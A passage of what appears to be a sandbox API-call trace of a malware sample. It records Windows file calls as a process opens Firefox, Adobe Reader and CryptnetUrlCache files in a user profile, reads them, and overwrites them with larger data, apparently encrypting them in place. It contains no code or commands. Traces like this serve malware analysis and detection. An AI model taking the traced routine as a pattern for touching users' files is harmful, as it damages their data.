[0168.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="24B53d01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0168.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="24B53d01", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="24B53d01", lpUsedDefaultChar=0x0) returned 8 [0168.681] ReadFile (in: hFile=0x204, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0168.683] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x123d5 [0168.683] ReadFile (in: hFile=0x204, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0168.684] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x123d5 [0168.684] WriteFile (in: hFile=0x204, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0168.684] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0168.684] WriteFile (in: hFile=0x204, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0168.684] CloseHandle (hObject=0x204) returned 1 [0168.685] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0168.685] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0168.685] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x400000 [0168.686] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0168.686] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.686] ReleaseMutex (hMutex=0x168) returned 1 [0168.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_CACHE_001_", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0168.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_CACHE_001_", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_CACHE_001_", lpUsedDefaultChar=0x0) returned 11 [0168.686] ReadFile (in: hFile=0x204, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0168.688] ReadFile (in: hFile=0x204, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0168.689] ReadFile (in: hFile=0x204, lpBuffer=0x2840938, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0168.689] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3fe000 [0168.689] ReadFile (in: hFile=0x204, lpBuffer=0x2667868, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0168.690] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3fe000 [0168.691] WriteFile (in: hFile=0x204, lpBuffer=0x25a96d8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesWritten=0x331f28c*=0x2588, lpOverlapped=0x0) returned 1 [0174.830] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0174.830] WriteFile (in: hFile=0x204, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.831] WriteFile (in: hFile=0x204, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.831] WriteFile (in: hFile=0x204, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x331f28c*=0x2000, lpOverlapped=0x0) returned 1 [0174.831] CloseHandle (hObject=0x204) returned 1 [0174.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0174.832] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0174.833] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x10 [0174.833] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0174.833] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.833] ReleaseMutex (hMutex=0x168) returned 1 [0174.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-phish-simple.pset", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0174.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-phish-simple.pset", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="test-phish-simple.pset", lpUsedDefaultChar=0x0) returned 22 [0174.833] ReadFile (in: hFile=0x204, lpBuffer=0x1f73448, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f73448*, lpNumberOfBytesRead=0x331f2bc*=0x10, lpOverlapped=0x0) returned 1 [0174.834] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0174.834] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x598, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x598, lpOverlapped=0x0) returned 1 [0174.834] CloseHandle (hObject=0x204) returned 1 [0174.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0174.835] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0174.835] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2000 [0174.835] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0174.835] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.835] ReleaseMutex (hMutex=0x168) returned 1 [0174.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReaderMessages", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0174.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReaderMessages", cchWideChar=14, lpMultiByteStr=0x1f7344c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReaderMessages", lpUsedDefaultChar=0x0) returned 14 [0174.835] ReadFile (in: hFile=0x204, lpBuffer=0x2667868, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x331f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0174.838] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0174.839] WriteFile (in: hFile=0x204, lpBuffer=0x25ab708*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25ab708*, lpNumberOfBytesWritten=0x331f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0174.839] CloseHandle (hObject=0x204) returned 1 [0174.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.169] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.169] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xb68 [0176.169] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.169] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.170] ReleaseMutex (hMutex=0x168) returned 1 [0176.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0176.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpUsedDefaultChar=0x0) returned 65 [0176.170] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0xb68, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f2bc*=0xb68, lpOverlapped=0x0) returned 1 [0176.171] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.172] WriteFile (in: hFile=0x1dc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x10f0, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f2d0*=0x10f0, lpOverlapped=0x0) returned 1 [0176.172] CloseHandle (hObject=0x1dc) returned 1 [0176.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.173] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.173] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x22a [0176.173] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.173] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.173] ReleaseMutex (hMutex=0x168) returned 1 [0176.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7396C420A8E1BC1DA97F1AF0D10BAD21", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0176.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7396C420A8E1BC1DA97F1AF0D10BAD21", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7396C420A8E1BC1DA97F1AF0D10BAD21", lpUsedDefaultChar=0x0) returned 32 [0176.174] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x22a, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x331f2bc*=0x22a, lpOverlapped=0x0) returned 1 [0176.175] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.175] WriteFile (in: hFile=0x1dc, lpBuffer=0x2890128*, nNumberOfBytesToWrite=0x7b2, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890128*, lpNumberOfBytesWritten=0x331f2d0*=0x7b2, lpOverlapped=0x0) returned 1 [0176.175] CloseHandle (hObject=0x1dc) returned 1 [0176.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.177] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.177] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1cf [0176.177] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.177] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.177] ReleaseMutex (hMutex=0x168) returned 1 [0176.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0176.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpUsedDefaultChar=0x0) returned 65 [0176.178] ReadFile (in: hFile=0x1dc, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x331f2bc*=0x1cf, lpOverlapped=0x0) returned 1 [0176.179] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.179] WriteFile (in: hFile=0x1dc, lpBuffer=0x2890128*, nNumberOfBytesToWrite=0x757, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890128*, lpNumberOfBytesWritten=0x331f2d0*=0x757, lpOverlapped=0x0) returned 1 [0176.179] CloseHandle (hObject=0x1dc) returned 1 [0176.180] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.181] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.181] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x56e [0176.181] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.181] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.181] ReleaseMutex (hMutex=0x168) returned 1 [0176.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0176.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpUsedDefaultChar=0x0) returned 65 [0176.182] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x56e, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x331f2bc*=0x56e, lpOverlapped=0x0) returned 1 [0176.184] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.184] WriteFile (in: hFile=0x1dc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xaf6, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f2d0*=0xaf6, lpOverlapped=0x0) returned 1 [0176.184] CloseHandle (hObject=0x1dc) returned 1 [0176.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.186] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.186] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x652 [0176.186] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0176.186] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.186] ReleaseMutex (hMutex=0x168) returned 1 [0176.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0176.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpUsedDefaultChar=0x0) returned 65 [0176.187] ReadFile (in: hFile=0x1dc, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x652, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x331f2bc*=0x652, lpOverlapped=0x0) returned 1 [0176.189] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0176.189] WriteFile (in: hFile=0x1dc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xbda, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f2d0*=0xbda, lpOverlapped=0x0) returned 1 [0176.189] CloseHandle (hObject=0x1dc) returned 1 [0176.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.190] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, 